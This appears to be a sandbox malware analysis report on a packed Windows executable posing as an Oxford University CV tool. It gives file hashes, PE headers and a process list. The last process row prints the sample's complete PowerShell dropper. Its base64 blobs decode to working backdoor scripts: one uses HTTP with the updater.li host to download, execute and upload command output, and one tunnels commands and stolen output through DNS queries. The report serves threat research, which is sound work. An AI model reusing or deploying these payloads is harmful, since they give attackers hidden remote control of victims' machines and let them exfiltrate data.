File name: | f77ee804de304f7c3ea6b87824684b33 |
Full analysis: | https://app.any.run/tasks/a2c0360b-970e-4182-a42c-2072fe991dda |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 11:14:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed |
MD5: | F77EE804DE304F7C3EA6B87824684B33 |
SHA1: | 3BF06FFC1A7808A41367F69325937B9F5EDC9BDB |
SHA256: | CE953229B8D8D71B83CF9A4B784F1A221DF4E798FD9EA9C35F24AC45CE5485BE |
SSDEEP: | 49152:lcPO0P1hBnZLLn+RnVrh2qZL6r7N0FaSKd4OsmCk:ixPxnZ/n+Rnf2qZ+/N0TKd4OsmCk |
.exe | | | UPX compressed Win32 Executable (38.2) |
---|---|---|
.exe | | | Win32 EXE Yoda's Crypter (37.5) |
.dll | | | Win32 Dynamic Link Library (generic) (9.2) |
.exe | | | Win32 Executable (generic) (6.3) |
.exe | | | Win16/32 Executable Delphi generic (2.9) |
ProductVersion: | 2.2.0.0 |
---|---|
ProductName: | University Of Oxford CV creator |
OriginalFileName: | OxfordSymposiumRegTool |
LegalTrademarks: | - |
LegalCopyright: | - |
InternalName: | OxfordSymposiumRegTool |
FileVersion: | 2.2.0.0 |
FileDescription: | - |
CompanyName: | University Of Oxford |
CharacterSet: | ASCII |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Executable application |
FileOS: | Win32 |
FileFlags: | (none) |
FileFlagsMask: | 0x003f |
ProductVersionNumber: | 2.2.0.0 |
FileVersionNumber: | 2.2.0.0 |
Subsystem: | Windows GUI |
SubsystemVersion: | 4 |
ImageVersion: | - |
OSVersion: | 4 |
EntryPoint: | 0x1ed370 |
UninitializedDataSize: | 1380352 |
InitializedDataSize: | 32768 |
CodeSize: | 638976 |
LinkerVersion: | 2.25 |
PEType: | PE32 |
TimeStamp: | 1992:06:20 00:22:17+02:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 19-Jun-1992 22:22:17 |
Detected languages: |
|
CompanyName: | University Of Oxford |
FileDescription: | - |
FileVersion: | 2.2.0.0 |
InternalName: | OxfordSymposiumRegTool |
LegalCopyright: | - |
LegalTrademarks: | - |
OriginalFilename: | OxfordSymposiumRegTool |
ProductName: | University Of Oxford CV creator |
ProductVersion: | 2.2.0.0 |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0050 |
Pages in file: | 0x0002 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x000F |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x001A |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000100 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 19-Jun-1992 22:22:17 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
UPX0 | 0x00001000 | 0x00151000 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
UPX1 | 0x00152000 | 0x0009C000 | 0x0009C000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99945 |
.rsrc | 0x001EE000 | 0x00008000 | 0x00007200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 4.54381 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.12735 | 702 | UNKNOWN | English - United States | RT_MANIFEST |
2 | 7.24092 | 308 | UNKNOWN | UNKNOWN | RT_CURSOR |
3 | 7.32611 | 308 | UNKNOWN | UNKNOWN | RT_CURSOR |
4 | 7.96094 | 4268 | UNKNOWN | UNKNOWN | RT_CURSOR |
5 | 7.37615 | 308 | UNKNOWN | UNKNOWN | RT_CURSOR |
6 | 7.29437 | 308 | UNKNOWN | UNKNOWN | RT_CURSOR |
7 | 7.3232 | 308 | UNKNOWN | UNKNOWN | RT_CURSOR |
8 | 7.95807 | 4268 | UNKNOWN | UNKNOWN | RT_CURSOR |
9 | 7.35209 | 308 | UNKNOWN | UNKNOWN | RT_CURSOR |
10 | 7.26363 | 308 | UNKNOWN | UNKNOWN | RT_CURSOR |
KERNEL32.DLL |
MsVfW32.dll |
advapi32.dll |
comctl32.dll |
comdlg32.dll |
gdi32.dll |
ole32.dll |
oleaut32.dll |
shell32.dll |
user32.dll |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3628 | "C:\Users\admin\AppData\Local\Temp\f77ee804de304f7c3ea6b87824684b33.exe" | C:\Users\admin\AppData\Local\Temp\f77ee804de304f7c3ea6b87824684b33.exe | — | explorer.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3252 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{Start-Sleep -s 1}" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | f77ee804de304f7c3ea6b87824684b33.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3484 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "&{Start-Sleep -s 2;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzXFJlY29yZGVkVFZcIg0KDQpEbkVDbWQxPSJwb3dlcnNoZWxsIC1FeGVjdXRpb25Qb2xpY3kgQnlwYXNzIC1GaWxlICImSE9NRSYiRG5FMS5wczEiDQpDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5SdW4gRG5FQ21kMSwwDQoNCkRuc0NtZDE9InBvd2Vyc2hlbGwgLUV4ZWN1dGlvblBvbGljeSBCeXBhc3MgLUZpbGUgIiZIT01FJiJEblMxLnBzMSINCkNyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpLlJ1biBEbnNDbWQxLDA=')); Set-Content 'C:\Users\Public\Libraries\RecordedTV\backup1.vbs' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JE1ZSE9NRSA9ICRFbnY6UHVibGljKyJcTGlicmFyaWVzXFJlY29yZGVkVFZcIjsNCiRTRVJWRVIgPSAiaHR0cDovL3VwZGF0ZXIubGkvaW5kZXguYXNweD9pZD1fX1wiOw0KJFVQID0gInVwXCI7DQokRE4gPSAiZG5cIjsNCiRUUCA9ICJ0cFwiOw0KJFVQTEsgPSAidXBsb2NrIjsNCiRETkxLID0gImR3bmxvY2siOw0KDQoNCmZ1bmN0aW9uIERvd25sb2FkRmlsZSgkbGluaywgJHBhdGgpDQp7DQoJJHdjID0gbmV3LW9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsNCgkkd2MuVXNlRGVmYXVsdENyZWRlbnRpYWxzID0gJHRydWU7DQoJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTsNCgkkd2MuSGVhZGVycy5hZGQoJ1VzZXItQWdlbnQnLCdNaWNyb3NvZnQgQklUUy83LjcnKTsNCgkkd2MuSGVhZGVycy5hZGQoJ0FjY2VwdC1MYW5ndWFnZScsJ2VuLVVTLGVuO3E9MC41Jyk7DQoJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQtRW5jb2RpbmcnLCdnemlwLCBkZWZsYXRlJyk7DQoJJHdjLkhlYWRlcnMuYWRkKCdSZWZlcmVyJywnaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbScpOw0KCSR3Yy5IZWFkZXJzLmFkZCgnUHJhZ21hJywnbm8tY2FjaGUnKTsNCgkkd2MuSGVhZGVycy5hZGQoJ0NhY2hlLUNvbnRyb2wnLCduby1jYWNoZScpOw0KCSRyID0gR2V0LVJhbmRvbTsNCgkkZmlsZSA9ICgkcGF0aC5UcmltRW5kKCdcJykpKydcJyskcjsNCgl0cnkNCgl7DQoJCSR3Yy5Eb3dubG9hZEZpbGUoJGxpbmssJGZpbGUpOw0KCX0NCgljYXRjaCBbU3lzdGVtLk5ldC5XZWJFeGNlcHRpb25dDQoJew0KCQkkd2MuSGVhZGVycy5hZGQoJ1JlZmVyZXInLCdodHRwczovL3d3dy5nb29nbGUuY29tJyk7DQoJCSR3Yy5IZWFkZXJzLmFkZCgnQWNjZXB0JywnKi8qJyk7DQoJCSR3Yy5IZWFkZXJzWydVc2VyLUFnZW50J10gPSAnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4zOyBXaW42NDsgeDY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbyc7DQoJCQ0KCQl0cnkNCgkJew0KCQkJJHdjLkRvd25sb2FkRmlsZSgkbGluaywkZmlsZSk7DQoJCX0NCgkJY2F0Y2gNCgkJew0KCQkJdGhyb3cgW1N5c3RlbS5OZXQuV2ViRXhjZXB0aW9uXSAkXy5FeGNlcHRpb24uVG9TdHJpbmcoKTsNCgkJfQ0KCX0NCgkkY2QgPSAkd2MuUmVzcG9uc2VIZWFkZXJzWydDb250ZW50LURpc3Bvc2l0aW9uJ107DQoJJGZpbGVuYW1lID0gJGNkLlN1YnN0cmluZygkY2QuSW5kZXhPZignZmlsZW5hbWU9JykrOSk7DQoJJGZpbGVuYW1lID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZmlsZW5hbWUuUmVwbGFjZSgnLScsJy8nKSkpOw0KCVNldC1Db250ZW50IC1QYXRoICgoJHBhdGguVHJpbUVuZCgnXCcpKSsnXCcrJGZpbGVuYW1lKSAtVmFsdWUgKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoKEdldC1Db250ZW50IC1QYXRoICRmaWxlKSkpIC1FbmNvZGluZyBCeXRlOw0KCVJlbW92ZS1JdGVtICRmaWxlIC1Gb3JjZTsNCglyZXR1cm4gKCgkcGF0aC5UcmltRW5kKCdcJykpKydcJyskZmlsZW5hbWUpOw0KfQ0KDQoNCg0KZnVuY3Rpb24gRG93blRoZW1BbGwNCnsNCglpZigtbm90KFRlc3QtUGF0aCAkTVlIT01FJEROTEspKQ0KCXsNCgkJTmV3LUl0ZW0gJE1ZSE9NRSRETkxLIC10eXBlIGZpbGU7DQoJCSRpID0gMTsNCgkJd2hpbGUoJGkgLWxlIDMpDQoJCXsNCgkJCXRyeQ0KCQkJew0KCQkJCURvd25sb2FkRmlsZSAoJFNFUlZFUisnZCcpICgkTVlIT01FKyRETik7DQoJCQl9DQoJCQljYXRjaA0KCQkJew0KCQkJCWJyZWFrOw0KCQkJfQ0KCQkJJGkrKzsNCgkJfQ0KCQlSZW1vdmUtSXRlbSAkTVlIT01FJEROTEsgLUZvcmNlOw0KCX0NCn0NCg0KDQoNCmZ1bmN0aW9uIFVwbG9hZEZpbGVSZW1vdmUoJGZpbGUpDQp7DQoJaWYoKEdldC1JdGVtICgkZmlsZSkpLmxlbmd0aCAtZ3QgMCkNCgl7DQoJCSR3YyA9IG5ldy1vYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7DQoJCSR3Yy5Vc2VEZWZhdWx0Q3JlZGVudGlhbHMgPSAkdHJ1ZTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQnLCcqLyonKTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdVc2VyLUFnZW50JywnTWljcm9zb2Z0IEJJVFMvNy43Jyk7DQoJCSR3Yy5IZWFkZXJzLmFkZCgnQWNjZXB0LUxhbmd1YWdlJywnZW4tVVMsZW47cT0wLjUnKTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdBY2NlcHQtRW5jb2RpbmcnLCdnemlwLCBkZWZsYXRlJyk7DQoJCSR3Yy5IZWFkZXJzLmFkZCgnUmVmZXJlcicsJ2h0dHBzOi8vd3d3Lmdvb2dsZS5jb20nKTsNCgkJJHdjLkhlYWRlcnMuYWRkKCdQcmFnbWEnLCduby1jYWNoZScpOw0KCQkkd2MuSGVhZGVycy5hZGQoJ0NhY2hlLUNvbnRyb2wnLCduby1jYWNoZScpOw0KCQlbU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZygoW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRmaWxlKSkpIHwgT3V0LUZpbGUgJGZpbGUgLUVuY29kaW5nIERlZmF1bHQ7DQoJCSRpPTE7DQoJCXdoaWxlKCRpIC1sZSAzKQ0KCQl7DQoJCQl0cnkNCgkJCXsNCgkJCQkkd2MuVXBsb2FkRmlsZSgkU0VSVkVSKyd1JywkZmlsZSk7DQoJCQkJYnJlYWs7DQoJCQl9DQoJCQljYXRjaCBbU3lzdGVtLk5ldC5XZWJFeGNlcHRpb25dDQoJCQl7DQoJCQkJJGkrKzsNCgkJCQljb250aW51ZTsNCgkJCX0NCgkJfQ0KCQkNCgkJaWYgKCRpIC1lcSA0KQ0KCQl7DQoJCQkkd2MuSGVhZGVycy5hZGQoJ1JlZmVyZXInLCdodHRwczovL3d3dy5nb29nbGUuY29tJyk7DQoJCQkkd2MuSGVhZGVycy5hZGQoJ0FjY2VwdCcsJyovKicpOw0KCQkJJHdjLkhlYWRlcnNbJ1VzZXItQWdlbnQnXSA9ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjM7IFdpbjY0OyB4NjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJzsNCgkJCSRpID0gMTsNCgkJCXdoaWxlKCRpIC1sZSAzKQ0KCQkJew0KCQkJCXRyeQ0KCQkJCXsNCgkJCQkJJHdjLlVwbG9hZEZpbGUoJFNFUlZFUisndScsJGZpbGUpOw0KCQkJCQlicmVhazsNCgkJCQl9DQoJCQkJY2F0Y2ggW1N5c3RlbS5OZXQuV2ViRXhjZXB0aW9uXQ0KCQkJCXsNCgkJCQkJJGkrKzsNCgkJCQkJY29udGludWU7DQoJCQkJfQ0KCQkJfQ0KCQl9DQoJfQ0KCXdhaXRmb3IgdXBscHJvYyAvVCAxOw0KCVJlbW92ZS1JdGVtICRmaWxlOw0KfQ0KDQoNCmZ1bmN0aW9uIFVwVGhlbUFsbA0Kew0KCWlmKC1ub3QoVGVzdC1QYXRoICRNWUhPTUUkVVBMSykpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJFVQTEsgLXR5cGUgZmlsZTsNCgkJR2V0LUNoaWxkSXRlbSAkTVlIT01FJFVQIHwgRm9yRWFjaC1PYmplY3R7dHJ5e1VwbG9hZEZpbGVSZW1vdmUgKCRfLkZ1bGxOYW1lKX1jYXRjaHtjb250aW51ZX19Ow0KCQlSZW1vdmUtSXRlbSAkTVlIT01FJFVQTEsgLUZvcmNlOw0KCX0NCn0NCg0KDQpmdW5jdGlvbiBEb3dubG9hZEV4ZWN1dGUNCnsNCgl0cnkNCgl7DQoJCSRiYXRmaWxlID0gRG93bmxvYWRGaWxlICgkU0VSVkVSKydiJykgKCRNWUhPTUUrJEROKTsNCgl9DQoJY2F0Y2gNCgl7DQoJCXJldHVybjsNCgl9DQoJJGFyZ3M9Ii9jICIrJGJhdGZpbGUrIiA+ICIrJGJhdGZpbGUrIi50eHQiOw0KCVN0YXJ0LVByb2Nlc3MgLVdpbmRvd1N0eWxlIEhpZGRlbiAtV2FpdCAtRmlsZVBhdGggY21kIC1Bcmd1bWVudExpc3QgJGFyZ3M7DQoJVXBsb2FkRmlsZVJlbW92ZSgkYmF0ZmlsZSsnLnR4dCcpOw0KCVJlbW92ZS1JdGVtICgkYmF0ZmlsZSk7DQp9DQoNCg0KZnVuY3Rpb24gSW5pdENoZWNrDQp7DQoJaWYoLW5vdChUZXN0LVBhdGggJE1ZSE9NRSRETikpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJEROIC10eXBlIGRpcmVjdG9yeTsNCgl9DQoJaWYoLW5vdChUZXN0LVBhdGggJE1ZSE9NRSRVUCkpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJFVQIC10eXBlIGRpcmVjdG9yeTsNCgl9DQoJaWYoLW5vdChUZXN0LVBhdGggJE1ZSE9NRSRUUCkpDQoJew0KCQlOZXctSXRlbSAkTVlIT01FJFRQIC10eXBlIGRpcmVjdG9yeTsNCgl9DQp9DQoNCg0KDQpmdW5jdGlvbiBBbGl2ZQ0Kew0KCUluaXRDaGVjazsNCglEb3duVGhlbUFsbDsNCglEb3dubG9hZEV4ZWN1dGU7DQoJVXBUaGVtQWxsOw0KfQ0KDQoNCkFsaXZlOw=='));$f=$f -replace '__',(Get-Random);$f='powershell \"&{iex ''powershell -encodedcommand \"'+([System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\"''}\"'; Set-Content 'C:\Users\Public\Libraries\RecordedTV\DnE1.Ps1' $f;$f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGdsb2JhbDpteWhvc3QgPSAnLnVwZGF0ZXIubGknOw0KJGdsb2JhbDpmaWxlbmFtZSA9ICcnOw0KJGdsb2JhbDpteWZsYWcgPSAwOw0KJGdsb2JhbDpteWlkID0gJyMjIyc7DQokZ2xvYmFsOm15aG9tZSA9ICIkZW52OlB1YmxpY1xMaWJyYXJpZXNcUmVjb3JkZWRUVlwiOw0KDQoNCmZ1bmN0aW9uIGNvbnZlcnRUby1CYXNlMzYgKCRkZWNOdW09IiIpDQp7DQogICAgJGRlY051bSAlPSA0NjY1NjsNCiAgICAkYWxwaGFiZXQgPSAiMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaIjsNCiAgICBkbw0KICAgIHsNCiAgICAgICAgJHJlbWFpbmRlciA9ICgkZGVjTnVtICUgMzYpOw0KICAgICAgICAkY2hhciA9ICRhbHBoYWJldC5zdWJzdHJpbmcoJHJlbWFpbmRlciwxKTsNCiAgICAgICAgJGJhc2UzNk51bSA9ICIkY2hhciRiYXNlMzZOdW0iOw0KICAgICAgICAkZGVjTnVtID0gKCRkZWNOdW0gLSAkcmVtYWluZGVyKSAvIDM2Ow0KICAgIH0NCiAgICB3aGlsZSAoJGRlY051bSAtZ3QgMCk7DQogICAgJGJhc2UzNk51bS5QYWRMZWZ0KDMsJzAnKTsNCn0NCmZ1bmN0aW9uIEdldFN1YigkbXlmbGFnMiwgJGNtZGlkPScwMCcsICRwYXJ0aWQ9JzAwMCcpDQp7DQogICAgaWYoJG15ZmxhZzIgLWVxIDApDQogICAgew0KCQkoJ3p6MDAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpOw0KICAgIH0NCiAgICBlbHNlaWYoJG15ZmxhZzIgLWVxIDEpDQogICAgew0KICAgICAgICAoJ3p6JyskZ2xvYmFsOm15aWQrJzAwMDAwJysoY29udmVydFRvLUJhc2UzNihHZXQtUmFuZG9tIC1NYXhpbXVtIDQ2NjU1KSkpOw0KICAgIH0NCiAgICBlbHNlaWYoJG15ZmxhZzIgLWVxIDIpDQogICAgew0KICAgICAgICAoJ3p6JyskZ2xvYmFsOm15aWQrJGNtZGlkKyRwYXJ0aWQrKGNvbnZlcnRUby1CYXNlMzYoR2V0LVJhbmRvbSAtTWF4aW11bSA0NjY1NSkpKTsNCiAgICB9DQp9DQpmdW5jdGlvbiBTdHIySGV4KCRteXN0cikNCnsNCiAgICBbU3lzdGVtLkJpdENvbnZlcnRlcl06OlRvU3RyaW5nKFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OkRlZmF1bHQuR2V0Qnl0ZXMoJG15c3RyKSkuUmVwbGFjZSgiLSIsICIiKTsNCn0NCmZ1bmN0aW9uIEFsaXZlDQp7DQoJaWYoJGdsb2JhbDpteWlkIC1lcSAnIycrJyMjJykNCgl7DQoJCXJldHVybiAwOw0KCX0NCiAgICBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAxKSsnMzAnKTsNCiAgICAkc3ViID0gKChHZXRTdWIgMSkrJzIzMkEnKSArIChTdHIySGV4ICRnbG9iYWw6ZmlsZW5hbWUpOw0KICAgICRpID0gMTsNCiAgICAkcmV0ID0gMDsNCiAgICB3aGlsZSgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkNCiAgICB7DQogICAgICAgICRyZXQgPSAxOw0KICAgICAgICAkc3ViMiA9ICRzdWIgKyAoU3RyMkhleCAkaSk7DQogICAgICAgIFNlbmRSZWNlaXZlRE5TICRzdWIyOw0KICAgICAgICAkaSsrOw0KICAgIH0NCiAgICBpZigkcmV0IC1lcSAxKQ0KICAgIHsNCiAgICAgICAgRml4QmF0RmlsZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIpOw0KICAgIH0NCiAgICAkcmV0Ow0KfQ0KDQpmdW5jdGlvbiBTZW5kUmVjZWl2ZUROUyAoJGQpDQp7DQoJJGNudCA9IDA7DQoJd2hpbGUgKCRjbnQgLWx0IDIwKQ0KCXsNCgkJdHJ5DQoJCXsNCgkJCSRteWRhdGEgPSAoW1N5c3RlbS5OZXQuRE5TXTo6R2V0SG9zdEJ5TmFtZSgkZCskZ2xvYmFsOm15aG9zdCkuQWRkcmVzc0xpc3RbMF0pOw0KCQkJJG15ZGF0YSA9ICgkbXlkYXRhIHwgRm9yRWFjaC1PYmplY3QgeyRfLklQQWRkcmVzc1RvU3RyaW5nfSk7DQoJCQkkY250ID0gMjU7DQoJCX0NCgkJY2F0Y2gNCgkJew0KCQkJU3RhcnQtU2xlZXAgLW0gNTAwOw0KCQkJJGNudCsrOw0KCQl9DQoJfQ0KICAgIGlmKC1ub3QoJGNudCAtZXEgMjUpKQ0KICAgIHsNCiAgICAgICAgKCcjJysnIyMnKTsNCiAgICB9DQogICAgZWxzZWlmKCRnbG9iYWw6bXlmbGFnIC1lcSAwIC1hbmQgJG15ZGF0YS5TdGFydHNXaXRoKCczMy4zMy4nKSkNCiAgICB7DQogICAgICAgICR0bXAgPSAkbXlkYXRhLlN1YlN0cmluZyg2KS5TcGxpdCgnLicpOw0KICAgICAgICAkZ2xvYmFsOmZpbGVuYW1lID0gKFtjaGFyXSBbaW50XSAkdG1wWzBdKSArIChbY2hhcl0gW2ludF0gJHRtcFsxXSk7DQogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMTsNCiAgICB9DQogICAgZWxzZWlmICgkbXlkYXRhLkVxdWFscygnMzUuMzUuMzUuMzUnKSkNCiAgICB7DQogICAgICAgICRnbG9iYWw6bXlmbGFnID0gMDsNCiAgICB9DQogICAgZWxzZWlmICgkZ2xvYmFsOm15ZmxhZyAtZXEgMSkNCiAgICB7DQogICAgICAgICR0bXAgPSAkbXlkYXRhLlNwbGl0KCcuJyk7DQogICAgICAgIFtTeXN0ZW0uSU8uRmlsZV06OkFwcGVuZEFsbFRleHQoJGdsb2JhbDpteWhvbWUrJ3RwXCcrJGdsb2JhbDpmaWxlbmFtZSsiLmJhdCIsICgoW2NoYXJdIFtpbnRdICR0bXBbMF0pICsgKFtjaGFyXSBbaW50XSAkdG1wWzFdKSArIChbY2hhcl0gW2ludF0gJHRtcFsyXSkgKyAoW2NoYXJdIFtpbnRdICR0bXBbM10pKSk7DQogICAgfQ0KICAgIGVsc2VpZigkZ2xvYmFsOm15aWQgLWVxICcjJysnIyMnKQ0KICAgIHsNCiAgICAgICAgKFtjaGFyXSBbaW50XSAkbXlkYXRhLlNwbGl0KCcuJylbMF0pOw0KICAgIH0NCn0NCmZ1bmN0aW9uIEZpeEJhdEZpbGUgKCRiYXRwYXRoKQ0Kew0KICAgIChHZXQtQ29udGVudCAkYmF0cGF0aCkuU3Vic3RyaW5nKDEwKSB8IFNldC1Db250ZW50ICRiYXRwYXRoOw0KfQ0KZnVuY3Rpb24gU2VuZEZpbGUoJG15RmlsZVBhdGgpDQp7DQogICAgJG15RmlsZU5hbWUgPSBbU3lzdGVtLklPLlBhdGhdOjpHZXRGaWxlTmFtZVdpdGhvdXRFeHRlbnNpb24oJG15RmlsZVBhdGgpOw0KICAgICRteXN0ciA9IFtTeXN0ZW0uSU8uRmlsZV06OlJlYWRBbGxUZXh0KCRteUZpbGVQYXRoKTsNCiAgICAkaT0wOw0KICAgICRteXRlbXAgPSAnJzsNCiAgICAkaj0wOw0KICAgIHdoaWxlKCRpIC1sZSAkbXlzdHIuTGVuZ3RoKQ0KICAgIHsNCiAgICAgICAgJG15dGVtcCArPSAkbXlzdHJbJGldOw0KICAgICAgICBpZigoKCRpJTI0KSAtZXEgMjMpIC1vciAoJGkgLWVxICRteXN0ci5MZW5ndGgpKQ0KICAgICAgICB7DQogICAgICAgICAgICAkbXloZXggPSBTdHIySGV4ICRteXRlbXA7DQogICAgICAgICAgICBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAyICRteUZpbGVOYW1lIChjb252ZXJ0VG8tQmFzZTM2ICRqKSkgKyAkbXloZXgpOw0KICAgICAgICAgICAgJGorKzsNCiAgICAgICAgICAgICRteXRlbXAgPSAnJzsNCiAgICAgICAgfQ0KICAgICAgICAkaSsrOw0KICAgIH0NCn0NCmZ1bmN0aW9uIEdldElEDQp7DQoJJHZhbGlkY2hhcnMgPSAiMDEyMzQ1Njc4OUFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoiOw0KICAgICR0aWQgPSBTZW5kUmVjZWl2ZUROUyAoKEdldFN1YiAwKSsnMzAnKTsNCglpZiAoJHZhbGlkY2hhcnMuQ29udGFpbnMoJHRpZCkpeyRnbG9iYWw6bXlpZD0kdGlkO30NCn0NCmZ1bmN0aW9uIENoYW5nZVRoaXNGaWxlICgkYm90aWQpDQp7DQoJaWYoLW5vdCgkZ2xvYmFsOm15aWQgLWVxICgnIycrJyMjJykpKQ0KICAgIHsNCgkJJGZjPShHZXQtQ29udGVudCAkZW52OlB1YmxpY1xMaWJyYXJpZXNcUmVjb3JkZWRUVlxEblMxLnBzMSAtRW5jb2RpbmcgQXNjaWkpOw0KCQkkZmM9JGZjLlN1YlN0cmluZyg0NykuVHJpbUVuZCgnIicnfSInKTsNCgkJJGZjPVtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGZjKSk7DQoJCSRmYz0kZmMgLXJlcGxhY2UgKCcjJysnIyMnKSwkYm90aWQ7DQoJCSRmYz1bU3lzdGVtLkNvbnZlcnRdOjpUb0Jhc2U2NFN0cmluZyhbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlLkdldEJ5dGVzKCRmYykpOw0KCQkkZmM9J3Bvd2Vyc2hlbGwgIiZ7aWV4ICcncG93ZXJzaGVsbCAtZW5jb2RlZGNvbW1hbmQgIicrJGZjKyciJyd9Iic7DQoJCVNldC1Db250ZW50ICRlbnY6UHVibGljXExpYnJhcmllc1xSZWNvcmRlZFRWXERuUzEucHMxICRmYyAtRW5jb2RpbmcgQXNjaWk7DQoJfQ0KfQ0KZnVuY3Rpb24gSW5pdA0Kew0KICAgIGlmKCRnbG9iYWw6bXlpZCAtZXEgKCcjJysnIyMnKSkNCiAgICB7DQoJCW1kIC1Gb3JjZSAoJGdsb2JhbDpteWhvbWUrJ3RwXCcpOw0KCQlHZXRJRDsNCgkJQ2hhbmdlVGhpc0ZpbGUgJGdsb2JhbDpteWlkOw0KICAgIH0NCn0NCmZ1bmN0aW9uIG1haW4NCnsNCiAgICBJbml0Ow0KICAgIGlmKEFsaXZlIC1lcSAxKQ0KICAgIHsNCiAgICAgICAgSW52b2tlLUV4cHJlc3Npb24gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy5iYXQgPiAnKyRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKTsNCiAgICAgICAgU2VuZEZpbGUgKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKTsNCiAgICAgICAgUmVtb3ZlLUl0ZW0gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy5iYXQnKTsNCiAgICAgICAgUmVtb3ZlLUl0ZW0gKCRnbG9iYWw6bXlob21lKyd0cFwnKyRnbG9iYWw6ZmlsZW5hbWUrJy50eHQnKTsNCiAgICB9DQp9DQptYWluOw0K'));$f='powershell \"&{iex ''powershell -encodedcommand \"'+([System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($f)))+'\"''}\"';Set-Content 'C:\Users\Public\Libraries\RecordedTV\DnS1.Ps1' $f}" | 